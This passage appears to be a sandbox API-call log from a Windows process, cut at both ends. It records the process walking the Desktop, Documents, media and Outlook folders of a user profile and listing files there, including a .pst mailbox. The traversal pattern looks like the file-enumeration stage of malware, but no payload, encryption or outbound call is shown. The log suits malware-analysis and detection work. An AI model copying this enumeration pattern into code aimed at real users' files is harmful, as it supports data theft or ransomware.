wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.768] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\") returned="YnPBSI277\\" [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.768] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.768] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0180.768] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.768] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.768] PathFindFileNameW (pszPath="") returned="" [0180.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.769] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4bcfb30, ftCreationTime.dwHighDateTime=0x1d8995c, ftLastAccessTime.dwLowDateTime=0xece51490, ftLastAccessTime.dwHighDateTime=0x1d8a365, ftLastWriteTime.dwLowDateTime=0xece51490, ftLastWriteTime.dwHighDateTime=0x1d8a365, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4bcfb30, ftCreationTime.dwHighDateTime=0x1d8995c, ftLastAccessTime.dwLowDateTime=0xece51490, ftLastAccessTime.dwHighDateTime=0x1d8a365, ftLastWriteTime.dwLowDateTime=0xece51490, ftLastWriteTime.dwHighDateTime=0x1d8a365, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4893000, ftCreationTime.dwHighDateTime=0x1d89a17, ftLastAccessTime.dwLowDateTime=0xa587b860, ftLastAccessTime.dwHighDateTime=0x1d89a86, ftLastWriteTime.dwLowDateTime=0xa587b860, ftLastWriteTime.dwHighDateTime=0x1d89a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5Ctq03jfOkJI397", cAlternateFileName="5CTQ03~1")) returned 1 [0180.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0180.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0180.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26438ff0, ftCreationTime.dwHighDateTime=0x1d89b5f, ftLastAccessTime.dwLowDateTime=0x1adb3990, ftLastAccessTime.dwHighDateTime=0x1d89d32, ftLastWriteTime.dwLowDateTime=0x1adb3990, ftLastWriteTime.dwHighDateTime=0x1d89d32, nFileSizeHigh=0x0, nFileSizeLow=0xfc31, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bp67ry2E oYq1FPgm.mp4", cAlternateFileName="BP67RY~1.MP4")) returned 1 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ee7d40, ftCreationTime.dwHighDateTime=0x1d89c4c, ftLastAccessTime.dwLowDateTime=0xad51b1d0, ftLastAccessTime.dwHighDateTime=0x1d8a626, ftLastWriteTime.dwLowDateTime=0xad51b1d0, ftLastWriteTime.dwHighDateTime=0x1d8a626, nFileSizeHigh=0x0, nFileSizeLow=0x16b02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hAK2yhq7O.jpg", cAlternateFileName="HAK2YH~1.JPG")) returned 1 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc051640, ftCreationTime.dwHighDateTime=0x1d89b18, ftLastAccessTime.dwLowDateTime=0xf8da1cc0, ftLastAccessTime.dwHighDateTime=0x1d8a412, ftLastWriteTime.dwLowDateTime=0xf8da1cc0, ftLastWriteTime.dwHighDateTime=0x1d8a412, nFileSizeHigh=0x0, nFileSizeLow=0xd11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ov6fZG.bmp", cAlternateFileName="")) returned 1 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed5abc70, ftCreationTime.dwHighDateTime=0x1d8a236, ftLastAccessTime.dwLowDateTime=0xdcee2ab0, ftLastAccessTime.dwHighDateTime=0x1d8a44e, ftLastWriteTime.dwLowDateTime=0xdcee2ab0, ftLastWriteTime.dwHighDateTime=0x1d8a44e, nFileSizeHigh=0x0, nFileSizeLow=0xab89, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qia7.bmp", cAlternateFileName="")) returned 1 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45f368f0, ftCreationTime.dwHighDateTime=0x1d8971f, ftLastAccessTime.dwLowDateTime=0x78c93f70, ftLastAccessTime.dwHighDateTime=0x1d8a6a1, ftLastWriteTime.dwLowDateTime=0x78c93f70, ftLastWriteTime.dwHighDateTime=0x1d8a6a1, nFileSizeHigh=0x0, nFileSizeLow=0xfc74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZ4wuGCPKPt9a.pps", cAlternateFileName="YZ4WUG~1.PPS")) returned 1 [0180.771] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45f368f0, ftCreationTime.dwHighDateTime=0x1d8971f, ftLastAccessTime.dwLowDateTime=0x78c93f70, ftLastAccessTime.dwHighDateTime=0x1d8a6a1, ftLastWriteTime.dwLowDateTime=0x78c93f70, ftLastWriteTime.dwHighDateTime=0x1d8a6a1, nFileSizeHigh=0x0, nFileSizeLow=0xfc74, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YZ4wuGCPKPt9a.pps", cAlternateFileName="YZ4WUG~1.PPS")) returned 0 [0180.771] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.772] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\") returned="8NNLi0kOEoM-mpUM785\\" [0180.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0180.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0180.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.773] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.773] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.773] PathFindFileNameW (pszPath="") returned="" [0180.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.773] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802f9170, ftCreationTime.dwHighDateTime=0x1d89cbe, ftLastAccessTime.dwLowDateTime=0x4c8902e0, ftLastAccessTime.dwHighDateTime=0x1d8a4f5, ftLastWriteTime.dwLowDateTime=0x4c8902e0, ftLastWriteTime.dwHighDateTime=0x1d8a4f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.776] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802f9170, ftCreationTime.dwHighDateTime=0x1d89cbe, ftLastAccessTime.dwLowDateTime=0x4c8902e0, ftLastAccessTime.dwHighDateTime=0x1d8a4f5, ftLastWriteTime.dwLowDateTime=0x4c8902e0, ftLastWriteTime.dwHighDateTime=0x1d8a4f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.776] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8906d050, ftCreationTime.dwHighDateTime=0x1d898b4, ftLastAccessTime.dwLowDateTime=0x5fe6cbb0, ftLastAccessTime.dwHighDateTime=0x1d89b8b, ftLastWriteTime.dwLowDateTime=0x5fe6cbb0, ftLastWriteTime.dwHighDateTime=0x1d89b8b, nFileSizeHigh=0x0, nFileSizeLow=0x1752a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6_x m.odp", cAlternateFileName="6_XM~1.ODP")) returned 1 [0180.776] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2887e220, ftCreationTime.dwHighDateTime=0x1d8a609, ftLastAccessTime.dwLowDateTime=0x18814400, ftLastAccessTime.dwHighDateTime=0x1d8a6f6, ftLastWriteTime.dwLowDateTime=0x18814400, ftLastWriteTime.dwHighDateTime=0x1d8a6f6, nFileSizeHigh=0x0, nFileSizeLow=0x67e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ct fMZqR_ubHOI0.odt", cAlternateFileName="CTFMZQ~1.ODT")) returned 1 [0180.776] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3290cde0, ftCreationTime.dwHighDateTime=0x1d8a55a, ftLastAccessTime.dwLowDateTime=0x229f3950, ftLastAccessTime.dwHighDateTime=0x1d8a742, ftLastWriteTime.dwLowDateTime=0x229f3950, ftLastWriteTime.dwHighDateTime=0x1d8a742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hfGoG8BRVBw", cAlternateFileName="HFGOG8~1")) returned 1 [0180.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ef48 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.777] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58435230, ftCreationTime.dwHighDateTime=0x1d8a0a3, ftLastAccessTime.dwLowDateTime=0xd26626c0, ftLastAccessTime.dwHighDateTime=0x1d8a664, ftLastWriteTime.dwLowDateTime=0xd26626c0, ftLastWriteTime.dwHighDateTime=0x1d8a664, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HIm fL", cAlternateFileName="HIMFL~1")) returned 1 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0180.777] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dc7d90, ftCreationTime.dwHighDateTime=0x1d8a1cd, ftLastAccessTime.dwLowDateTime=0xfc527820, ftLastAccessTime.dwHighDateTime=0x1d8a2f5, ftLastWriteTime.dwLowDateTime=0xfc527820, ftLastWriteTime.dwHighDateTime=0x1d8a2f5, nFileSizeHigh=0x0, nFileSizeLow=0x2dd1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S_CAeTbN.ots", cAlternateFileName="")) returned 1 [0180.777] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6972e460, ftCreationTime.dwHighDateTime=0x1d89a2e, ftLastAccessTime.dwLowDateTime=0x5186bf10, ftLastAccessTime.dwHighDateTime=0x1d8a533, ftLastWriteTime.dwLowDateTime=0x5186bf10, ftLastWriteTime.dwHighDateTime=0x1d8a533, nFileSizeHigh=0x0, nFileSizeLow=0x14463, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ua71cE_srBW.docx", cAlternateFileName="UA71CE~1.DOC")) returned 1 [0180.777] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 1 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b860 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ef48 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0180.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0180.777] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0 [0180.777] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.778] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.779] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Music\\") returned="My Music\\" [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.779] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.779] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.779] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.779] PathFindFileNameW (pszPath="") returned="" [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.779] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0xffffffff [0180.779] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.779] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\") returned="My Pictures\\" [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.780] PathFindFileNameW (pszPath="") returned="" [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.780] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0xffffffff [0180.780] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\") returned="My Videos\\" [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.781] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.781] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.781] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.781] PathFindFileNameW (pszPath="") returned="" [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ec70 [0180.781] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0xffffffff [0180.781] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.781] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.781] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0180.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.782] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0180.782] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.782] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.782] PathFindFileNameW (pszPath="") returned="" [0180.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eb38 [0180.782] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.786] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.786] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0180.786] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 0 [0180.786] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.786] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0180.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 